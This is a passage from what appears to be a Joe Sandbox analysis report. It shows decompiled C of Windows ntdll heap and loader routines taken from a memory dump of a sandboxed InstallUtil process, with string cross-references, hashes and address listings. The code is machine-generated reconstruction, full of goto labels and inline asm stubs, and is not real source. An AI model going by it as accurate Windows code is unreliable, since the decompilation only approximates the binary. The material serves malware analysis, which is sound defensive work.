				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E012EDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E01309730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0138A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E01309660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E012CB150();
					} else {
						E012CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E012CB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E012E7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0138138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E012E7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E012E7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01381582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E012E7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E012E7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01381582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0131D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x012ea229
0x012ea231
0x012ea23f
0x012ea242
0x012ea244
0x012ea24c
0x012ea255
0x012ea25a
0x012ea25f
0x01331c76
0x01331c78
0x01331c7e
0x01331c7f
0x01331c81
0x01331c82
0x01331c84
0x01331c89
0x01331c8b
0x01331c9e
0x01331c9e
0x01331cab
0x01331cb2
0x00000000
0x01331cb2
0x01331c8d
0x01331c92
0x00000000
0x00000000
0x01331c94
0x01331c98
0x00000000
0x00000000
0x00000000
0x01331c98
0x012ea265
0x012ea265
0x012ea266
0x012ea26f
0x012ea270
0x012ea276
0x012ea277
0x012ea279
0x012ea27e
0x012ea282
0x01331db5
0x01331dbb
0x01331dc1
0x01331dc5
0x01331de4
0x01331de9
0x01331dc7
0x01331ddc
0x01331de1
0x01331def
0x01331df3
0x01331df7
0x01331dfe
0x01331e06
0x012ea302
0x012ea308
0x012ea308
0x012ea288
0x012ea28d
0x012ea294
0x01331cc1
0x012ea29a
0x012ea29a
0x012ea29a
0x012ea29f
0x01331ccb
0x01331cd1
0x01331cd8
0x01331cea
0x01331cea
0x01331cd8
0x012ea2a9
0x012ea2af
0x012ea2bc
0x01331cfd
0x012ea2c2
0x012ea2c2
0x012ea2c2
0x012ea2c7
0x01331d07
0x01331d0d
0x01331d14
0x01331d1f
0x01331d21
0x01331d2c
0x01331d2c
0x01331d2c
0x01331d47
0x01331d47
0x01331d14
0x012ea2cd
0x012ea2d2
0x012ea2d9
0x01331d5a
0x012ea2df
0x012ea2df
0x012ea2df
0x012ea2e4
0x01331d69
0x01331d6b
0x01331d76
0x01331d76
0x01331d76
0x01331d91
0x01331d91
0x012ea2ea
0x012ea2f0
0x012ea2f5
0x01331da8
0x01331dad
0x01331dad
0x012ea2fd
0x012ea300
0x00000000

Strings

HEAP[%wZ]: , xrefs: 01331DD7
HEAP: , xrefs: 01331DE4
`, xrefs: 01331C8D
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 01331DF9

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 56d68dfe17a95f5b62b016dc8ed10419f7d7ee8c46affef1242bd6f59c7e1dd0
Instruction ID: 796fa88aa6757d993d415182420886bcf193ced3d42b340c5eafefefee1a2e72
Opcode Fuzzy Hash: 56d68dfe17a95f5b62b016dc8ed10419f7d7ee8c46affef1242bd6f59c7e1dd0
Instruction Fuzzy Hash: 655103322246819FE722EB68CC49F777BE8FF80B54F080568F9559B292D775D800CB66

Uniqueness

Uniqueness Score: -1.00%

Function 013849A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01384A3D, 01384AB7
HEAP: , xrefs: 01384A4A, 01384A5D, 01384A5F, 01384AC4
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01384A61
This is located in the %s field of the heap header., xrefs: 01384AD6

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: fce3937ceeda2b2a9f05eb29b420178391d55810448c219aea46e531267a1c26
Instruction ID: 50ab2b0be9ae9fc2518e9e39a3ec721ed2857c4b69612bd816a11e1f6a279bb0
Opcode Fuzzy Hash: fce3937ceeda2b2a9f05eb29b420178391d55810448c219aea46e531267a1c26
Instruction Fuzzy Hash: F2314632210306EFE721EB5DC889F67B7ECEF00B68F18415AF5068FA51E6B4A944C759

Uniqueness

Uniqueness Score: -1.00%

Function 012D8794 Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E012D8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E012D934A() != 0) {
								_t159 = E0134A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x13b5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01345510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x13b5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E012D849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E012D8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E012D8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x13b5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x13b5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E012E2280(_t92, 0x13b86cc);
															_t94 = E01399DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E012F61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x13b5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E012D8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x13b5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x13b5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0130F380(_t136, 0x12a1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E012E2280(_t108, 0x13b86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E012F61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01399D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E012DFFB0(_t118, _t156, 0x13b86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01309A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x012d8799
0x012d879d
0x012d87a1
0x012d87a3
0x012d87a8
0x012d87c3
0x012d87c3
0x012d87c8
0x012d87d1
0x012d87d4
0x012d87d8
0x012d87e5
0x012d87ec
0x01329bfe
0x01329c00
0x01329c02
0x01329c08
0x01329c0d
0x01329c0f
0x01329c14
0x01329c2d
0x01329c32
0x01329c37
0x01329c3a
0x01329c3c
0x01329c42
0x01329c42
0x01329c3c
0x01329c02
0x012d87da
0x012d87df
0x012d87e3
0x00000000
0x00000000
0x012d87e3
0x012d87f2
0x00000000
0x012d87fb
0x012d87fd
0x012d87fe
0x012d880e
0x012d880f
0x012d8810
0x012d8814
0x012d881a
0x012d881c
0x012d881f
0x012d8821
0x012d8822
0x012d8824
0x012d8826
0x012d882c
0x012d882e
0x01329c48
0x01329c48
0x012d8834
0x012d8834
0x012d8837
0x00000000
0x00000000
0x012d8837
0x012d882e
0x012d883d
0x012d8840
0x012d8843
0x012d8846
0x012d8849
0x012d884c
0x012d884e
0x012d8850
0x012d8852
0x012d8854
0x012d8857
0x012d88b4
0x012d88b6
0x012d88b6
0x012d8859
0x012d8859
0x012d8859
0x012d8861
0x012d8866
0x012d886a
0x012d893d
0x012d8941
0x00000000
0x012d8947
0x012d8947
0x012d894a
0x012d894c
0x00000000
0x012d8952
0x012d8955
0x012d895a
0x012d895d
0x012d895d
0x012d895f
0x012d8961
0x012d8961
0x012d8968
0x00000000
0x00000000
0x012d896a
0x012d896b
0x012d896e
0x00000000
0x012d8970
0x012d8970
0x012d8970
0x012d8970
0x012d8972
0x012d8972
0x012d8974
0x00000000
0x012d897a
0x012d897a
0x012d897d
0x00000000
0x012d8983
0x01329c65
0x01329c6d
0x01329c72
0x01329c75
0x01329c75
0x01329c82
0x01329c86
0x01329c87
0x01329c88
0x01329c89
0x01329c8c
0x01329c90
0x01329c95
0x01329c97
0x01329ca0
0x01329ca3
0x01329ca9
0x01329ca9
0x00000000
0x01329ca9
0x01329ca3
0x00000000
0x01329c97
0x012d897d
0x00000000
0x012d8974
0x012d8988
0x012d8992
0x012d8996
0x00000000
0x012d8996
0x012d894c
0x00000000
0x012d8870
0x012d887b
0x012d887d
0x012d887f
0x012d8881
0x012d8884
0x012d8884
0x012d8886
0x012d8889
0x012d888c
0x012d888e
0x012d8891
0x012d8891
0x012d8898
0x00000000
0x00000000
0x012d889a
0x012d889b
0x012d889e
0x00000000
0x00000000
0x012d88a0
0x012d88a8
0x012d88b0
0x012d88b2
0x012d88d3
0x012d88d5
0x00000000
0x012d88d7
0x012d88db
0x012d88dc
0x012d88e0
0x012d88e8
0x012d88ee
0x012d88f0
0x012d88f3
0x012d88fc
0x012d8901
0x012d8906
0x012d890c
0x012d890c
0x012d890f
0x012d8916
0x012d8917
0x012d8918
0x012d8919
0x012d891a
0x012d891f
0x012d8921
0x01329c52
0x01329c55
0x01329c5b
0x01329cac
0x01329cc0
0x01329cc0
0x01329c55
0x012d8927
0x012d8927
0x012d892f
0x012d8933
0x00000000
0x012d88f5
0x012d88f5
0x00000000
0x012d88f7
0x012d88f7
0x012d88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x012d88fa
0x012d88f5
0x012d88f3
0x00000000
0x012d88d5
0x00000000
0x012d88b2
0x012d88c9
0x00000000
0x012d88c9
0x012d887f
0x012d886a
0x012d8857
0x012d8852
0x012d88bf
0x012d88bf
0x012d87aa
0x012d87ad
0x012d87ae
0x012d87b4
0x012d87b5
0x012d87b6
0x012d87b8
0x012d87bd
0x012d87c1
0x012d87f4
0x012d87fa
0x00000000
0x00000000
0x00000000
0x012d87c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 01329C28
LdrpDoPostSnapWork, xrefs: 01329C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01329C18

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: f96b0739967429bcbfa69af71623374260cca592893cc50520fcf3eeeccbeb3b
Instruction ID: 37c9a3f2ab0583ea1b08171b814ef915cc916157650ff6834ceba774ddd0a15c
Opcode Fuzzy Hash: f96b0739967429bcbfa69af71623374260cca592893cc50520fcf3eeeccbeb3b
Instruction Fuzzy Hash: 83910471A2022BDFEF18DF59D481ABAB7B9FF44318F454069EA45AB240E730E901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012D7E41 Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E012D7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E012DCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E012CC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x13b5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01345510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x13b5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E012E7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E012E7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01347016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E012E7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E012E7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01347016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E012FA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E012CB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x012d7e4c
0x012d7e50
0x012d7e55
0x012d7e58
0x012d7e5d
0x012d7e71
0x012d7f33
0x012d7e77
0x012d7e77
0x012d7e79
0x012d7e79
0x012d7e7e
0x012d7f45
0x01329848
0x00000000
0x01329848
0x012d7f4e
0x012d7f53
0x012d7f5a
0x00000000
0x00000000
0x0132985a
0x01329862
0x01329866
0x00000000
0x0132986c
0x00000000
0x0132986c
0x012d7e84
0x012d7e84
0x012d7e8d
0x01329871
0x012d7eb8
0x012d7ec0
0x012d7ec0
0x012d7e9a
0x0132987e
0x00000000
0x00000000
0x01329884
0x0132988b
0x013298a7
0x013298ac
0x013298b1
0x013298b6
0x013298b8
0x013298b8
0x013298b9
0x00000000
0x013298b9
0x012d7ea0
0x012d7ea7
0x00000000
0x00000000
0x012d7eac
0x012d7eb1
0x012d7ec6
0x012d7ed0
0x013298cc
0x012d7ed6
0x012d7ed6
0x012d7ed6
0x012d7ede
0x012d7ee3
0x013298e3
0x013298f0
0x01329902
0x013298f2
0x013298fb
0x013298fb
0x01329907
0x0132991d
0x0132991d
0x01329907
0x013298e3
0x012d7ef0
0x012d7f14
0x012d7f14
0x012d7f1e
0x01329946
0x012d7f24
0x012d7f24
0x012d7f24
0x012d7f2c
0x0132996a
0x01329975
0x01329975
0x0132997e
0x01329993
0x01329993
0x0132997e
0x00000000
0x012d7ef2
0x012d7efc
0x012d7f0a
0x012d7f0e
0x01329933
0x00000000
0x01329933
0x00000000
0x012d7f0e
0x00000000
0x00000000
0x00000000
0x012d7eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 013298A2
LdrpCompleteMapModule, xrefs: 01329898
Could not validate the crypto signature for DLL %wZ, xrefs: 01329891

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 8a6b7ff7726a82dbbb90c96213546c6af37e7916b55ba3123e83e144a32d66f6
Instruction ID: 6c53e2c5fe37a781ac5bcbeec2d4b0f65b8008fec96fef3bdf16a158bd6c1573
Opcode Fuzzy Hash: 8a6b7ff7726a82dbbb90c96213546c6af37e7916b55ba3123e83e144a32d66f6
Instruction Fuzzy Hash: E6510131A20756DBEB22DB6CC944B6A7BE4EB0031CF0406A9EA519B7D1D7B8ED00C790

Uniqueness

Uniqueness Score: -1.00%

Function 012CE620 Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E012CE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E012CF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E013095D0();
						}
						if(_t78 != 0) {
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
